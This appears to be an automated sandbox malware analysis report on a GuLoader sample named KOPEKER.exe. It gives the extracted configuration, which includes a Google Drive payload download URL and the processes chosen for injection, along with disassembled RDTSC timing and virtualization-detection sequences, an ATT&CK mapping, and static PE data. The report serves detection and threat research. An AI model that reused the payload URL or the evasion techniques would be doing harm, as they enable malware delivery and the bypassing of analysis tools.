Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report KOPEKER.exe

Overview

General Information

Sample Name:KOPEKER.exe
Analysis ID:392084
MD5:cd885321b35b73421cd63e3150d677f7
SHA1:2f09e0eb93927d82076f34549b0d4d3b7b393aab
SHA256:495edfb60c0a9af0c57251ce28ca0bcf4c911324f59074f99c2797e36c3f3ef4
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
PE file contains strange resources
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • KOPEKER.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\KOPEKER.exe' MD5: CD885321B35B73421CD63E3150D677F7)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=13mbmc5DER0_wKkBDGQL230MFPs1cTVbi", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: KOPEKER.exe PID: 5760JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: KOPEKER.exe PID: 5760JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=13mbmc5DER0_wKkBDGQL230MFPs1cTVbi", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: KOPEKER.exeVirustotal: Detection: 62%Perma Link
        Source: KOPEKER.exeMetadefender: Detection: 32%Perma Link
        Source: KOPEKER.exeReversingLabs: Detection: 82%
        Machine Learning detection for sampleShow sources
        Source: KOPEKER.exeJoe Sandbox ML: detected
        Source: KOPEKER.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=13mbmc5DER0_wKkBDGQL230MFPs1cTVbi
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004096F20_2_004096F2
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004098390_2_00409839
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004098C20_2_004098C2
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A0E60_2_0040A0E6
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A09B0_2_0040A09B
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040994E0_2_0040994E
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A17E0_2_0040A17E
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004099E30_2_004099E3
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409A780_2_00409A78
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A29C0_2_0040A29C
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409B1B0_2_00409B1B
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A3350_2_0040A335
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040E33C0_2_0040E33C
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A3C60_2_0040A3C6
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409BAA0_2_00409BAA
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A45A0_2_0040A45A
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409C390_2_00409C39
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A4E50_2_0040A4E5
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409D710_2_00409D71
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409E980_2_00409E98
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040A7490_2_0040A749
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409F280_2_00409F28
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004097AA0_2_004097AA
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00409FB60_2_00409FB6
        Source: KOPEKER.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: KOPEKER.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: KOPEKER.exe, 00000000.00000002.986561193.0000000002200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs KOPEKER.exe
        Source: KOPEKER.exe, 00000000.00000002.1003029734.00000000050D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs KOPEKER.exe
        Source: KOPEKER.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/0
        Source: C:\Users\user\Desktop\KOPEKER.exeFile created: C:\Users\user\AppData\Local\Temp\~DF0ADD49C825BCA8F7.TMPJump to behavior
        Source: KOPEKER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\KOPEKER.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: KOPEKER.exeVirustotal: Detection: 62%
        Source: KOPEKER.exeMetadefender: Detection: 32%
        Source: KOPEKER.exeReversingLabs: Detection: 82%

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: KOPEKER.exe PID: 5760, type: MEMORY
        Yara detected VB6 Downloader GenericShow sources
        Source: Yara matchFile source: Process Memory Space: KOPEKER.exe PID: 5760, type: MEMORY
        Source: KOPEKER.exeStatic PE information: real checksum: 0x27f9e should be: 0x1d52b
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00408053 push 8EA106DEh; ret 0_2_00408058
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00405019 push FFFFFFF4h; retf 0_2_0040504C
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040C903 pushad ; ret 0_2_0040C938
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040C24B push 7600FFCEh; iretd 0_2_0040C250
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0040445A push 0D010762h; retf 0_2_00404464
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00402F28 push 713A1CACh; retf 0_2_00402F98
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00403789 push BB150FDEh; retf 0_2_0040379C

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
        Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (71).png
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00621226 0_2_00621226
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00627309 0_2_00627309
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0062266B 0_2_0062266B
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006226AB 0_2_006226AB
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00622733 0_2_00622733
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006227EB 0_2_006227EB
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006227BE 0_2_006227BE
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00622787 0_2_00622787
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626843 0_2_00626843
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0062282E 0_2_0062282E
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626806 0_2_00626806
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626804 0_2_00626804
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006248E3 0_2_006248E3
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006248C3 0_2_006248C3
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006268CF 0_2_006268CF
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006248A7 0_2_006248A7
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006228B7 0_2_006228B7
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0062488B 0_2_0062488B
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626892 0_2_00626892
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626966 0_2_00626966
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626907 0_2_00626907
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0062290E 0_2_0062290E
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0062690E 0_2_0062690E
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006249E7 0_2_006249E7
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006249C7 0_2_006249C7
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00624992 0_2_00624992
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_0062699F 0_2_0062699F
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00624A2B 0_2_00624A2B
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00624A0B 0_2_00624A0B
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00621C82 0_2_00621C82
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00625D75 0_2_00625D75
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00625DAE 0_2_00625DAE
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00625D8B 0_2_00625D8B
        Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 000000000062607D second address: 000000000062607D instructions:
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: KOPEKER.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 000000000040991D second address: 000000000040991D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 00000085h 0x00000008 cmp ebx, 00000000h 0x0000000b cmp ebx, 0000009Ch 0x00000011 cmp eax, 10h 0x00000014 cmp ebx, 27h 0x00000017 cmp ebx, 24h 0x0000001a cmp ebx, 00000092h 0x00000020 fsubr st(5), st(0) 0x00000022 fldz 0x00000024 packuswb mm6, mm5 0x00000027 fldz 0x00000029 fxch st(0), st(1) 0x0000002b faddp st(1), st(0) 0x0000002d fpatan 0x0000002f jmp 00007F44BC95AAFEh 0x00000031 cmp ebx, 63h 0x00000034 cmp ebx, 000000C6h 0x0000003a cmp eax, 000000A7h 0x0000003f cmp edi, 02EAFF40h 0x00000045 movd mm1, ebx 0x00000048 movd mm1, ebx 0x0000004b movd mm1, ebx 0x0000004e movd mm1, ebx 0x00000051 fst st(4) 0x00000053 pslld mm5, 15h 0x00000057 fabs 0x00000059 psrlw mm4, A7h 0x0000005d fnclex 0x0000005f punpckhwd xmm4, xmm1 0x00000063 psubusb mm5, mm1 0x00000066 jmp 00007F44BC95AAF9h 0x00000068 jne 00007F44BC95A8F8h 0x0000006e inc edi 0x0000006f cmp ebx, 000000C2h 0x00000075 cmp eax, 00000099h 0x0000007a cmp ebx, 5Dh 0x0000007d cmp eax, 00000096h 0x00000082 cmp eax, 68h 0x00000085 cmp eax, 40h 0x00000088 psraw xmm7, xmm3 0x0000008c paddb xmm4, xmm5 0x00000090 ffree st(3) 0x00000092 psraw mm4, mm6 0x00000095 fninit 0x00000097 punpcklbw mm6, mm1 0x0000009a psubw xmm0, xmm1 0x0000009e jmp 00007F44BC95AAFDh 0x000000a0 rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 0000000000626071 second address: 000000000062607D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pushad 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 000000000062607D second address: 000000000062607D instructions:
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 00000000006258C4 second address: 00000000006259C6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebp+04h] 0x0000000e jmp 00007F44BC95CB9Ah 0x00000010 cmp cl, dl 0x00000012 add eax, ebx 0x00000014 mov ecx, dword ptr [eax+18h] 0x00000017 jmp 00007F44BC95CB9Ah 0x00000019 cmp eax, 92C74976h 0x0000001e mov dword ptr [ebp+08h], ecx 0x00000021 mov ecx, dword ptr [eax+1Ch] 0x00000024 jmp 00007F44BC95CB9Ah 0x00000026 pushad 0x00000027 mov di, 847Ch 0x0000002b cmp di, 847Ch 0x00000030 jne 00007F44BC95C80Ch 0x00000036 popad 0x00000037 mov dword ptr [ebp+14h], ecx 0x0000003a mov ecx, dword ptr [eax+24h] 0x0000003d mov dword ptr [ebp+10h], ecx 0x00000040 jmp 00007F44BC95CB9Ah 0x00000042 cmp ecx, ecx 0x00000044 mov esi, dword ptr [eax+20h] 0x00000047 jmp 00007F44BC95CB9Ah 0x00000049 cmp ah, ch 0x0000004b add esi, dword ptr [ebp+04h] 0x0000004e xor ecx, ecx 0x00000050 jmp 00007F44BC95CB9Ah 0x00000052 cmp eax, edx 0x00000054 jmp 00007F44BC95CB9Ah 0x00000056 pushad 0x00000057 lfence 0x0000005a rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 00000000006257CD second address: 00000000006258C4 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b call 00007F44BC95AB2Bh 0x00000010 jmp 00007F44BC95AABAh 0x00000012 cmp ah, ch 0x00000014 mov dword ptr [ebp+04h], eax 0x00000017 jmp 00007F44BC95AABAh 0x00000019 cmp eax, edx 0x0000001b mov ebx, dword ptr [eax+3Ch] 0x0000001e add eax, ebx 0x00000020 mov ebx, dword ptr [eax+78h] 0x00000023 jmp 00007F44BC95AABAh 0x00000025 pushad 0x00000026 lfence 0x00000029 rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004096F2 rdtsc 0_2_004096F2
        Source: C:\Users\user\Desktop\KOPEKER.exeWindow / User API: threadDelayed 1256Jump to behavior
        Source: C:\Users\user\Desktop\KOPEKER.exeWindow / User API: threadDelayed 8744Jump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: KOPEKER.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

        Anti Debugging:

        barindex
        Found potential dummy code loops (likely to delay analysis)Show sources
        Source: C:\Users\user\Desktop\KOPEKER.exeProcess Stats: CPU usage > 90% for more than 60s
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_004096F2 rdtsc 0_2_004096F2
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006231CC mov eax, dword ptr fs:[00000030h]0_2_006231CC
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006222F6 mov eax, dword ptr fs:[00000030h]0_2_006222F6
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_006222C7 mov eax, dword ptr fs:[00000030h]0_2_006222C7
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00622286 mov eax, dword ptr fs:[00000030h]0_2_00622286
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00622295 mov eax, dword ptr fs:[00000030h]0_2_00622295
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00625480 mov eax, dword ptr fs:[00000030h]0_2_00625480
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626843 mov eax, dword ptr fs:[00000030h]0_2_00626843
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626806 mov eax, dword ptr fs:[00000030h]0_2_00626806
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00626804 mov eax, dword ptr fs:[00000030h]0_2_00626804
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00621C82 mov eax, dword ptr fs:[00000030h]0_2_00621C82
        Source: C:\Users\user\Desktop\KOPEKER.exeCode function: 0_2_00625F2A mov eax, dword ptr fs:[00000030h]0_2_00625F2A
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmpBinary or memory string: &Program Manager
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmpBinary or memory string: Progmanlock

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery511Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion11LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        KOPEKER.exe62%VirustotalBrowse
        KOPEKER.exe38%MetadefenderBrowse
        KOPEKER.exe83%ReversingLabsWin32.Trojan.VBObfuse
        KOPEKER.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox Version:31.0.0 Emerald
        Analysis ID:392084
        Start date:19.04.2021
        Start time:08:41:50
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 8m 40s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:KOPEKER.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@0/0
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 9.4% (good quality ratio 3.7%)
        • Quality average: 18.5%
        • Quality standard deviation: 24%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, MusNotifyIcon.exe, conhost.exe, svchost.exe

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        No created / dropped files found

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):5.7626204591873975
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.15%
        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:KOPEKER.exe
        File size:118784
        MD5:cd885321b35b73421cd63e3150d677f7
        SHA1:2f09e0eb93927d82076f34549b0d4d3b7b393aab
        SHA256:495edfb60c0a9af0c57251ce28ca0bcf4c911324f59074f99c2797e36c3f3ef4
        SHA512:cf8124f2fb91027365cb2ed941b121698a40e5992935bc0b3b6bdd15ad92a417ad62bf247b643132d886145dfcc6c3a48b3ee52aaa6fd8577e4b37457cd83c81
        SSDEEP:1536:q28031a0rd/d7dGBWBWevDWoiLUaYuWMm2IPKtopQYXQHoH5encrFQLn9MamuSHi:qiFa0BGBWYeaoNHKtG+JMi
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................p...`......h.............@................

        File Icon

        Icon Hash:c0c6f2e0e4fefe3f

        Static PE Info

        General

        Entrypoint:0x401968
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        DLL Characteristics:
        Time Stamp:0x4A88EC80 [Mon Aug 17 05:37:04 2009 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:7677b40f5f8927412a58af017314f1ed

        Entrypoint Preview

        Instruction
        push 0040F4D8h
        call 00007F44BCECE623h
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        xor byte ptr [eax], al
        add byte ptr [eax], al
        inc eax
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [ebx-604C4D3Dh], dl
        cmp eax, 0B8E48E7h
        imul edi, dword ptr [esi+3Dh], 00FB3ECEh
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [ecx], al
        add byte ptr [eax], al
        add byte ptr [ecx+00h], al
        push es
        push eax
        xchg eax, ebx
        add ah, byte ptr [ecx+edi*2+72h]
        imul esi, dword ptr [edx+65h], 64h
        jnc 00007F44BCECE697h
        outsb
        add byte ptr [edx], ch
        int1
        add al, byte ptr [eax]
        add byte ptr [eax], al
        add bh, bh
        int3
        xor dword ptr [eax], eax
        or al, 1Ah
        wait
        xor al, 5Ch
        push edi
        mov bp, seg?
        inc eax
        nop
        xchg byte ptr [ebp-3Dh], bl
        dec edi
        loope 00007F44BCECE5DFh
        jl 00007F44BCECE61Fh
        xchg eax, edx
        and eax, dword ptr [edx]
        xor esp, eax
        dec esi
        lodsd
        push edx
        and ebx, dword ptr [edx]

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x177640x28.text
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x3822.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
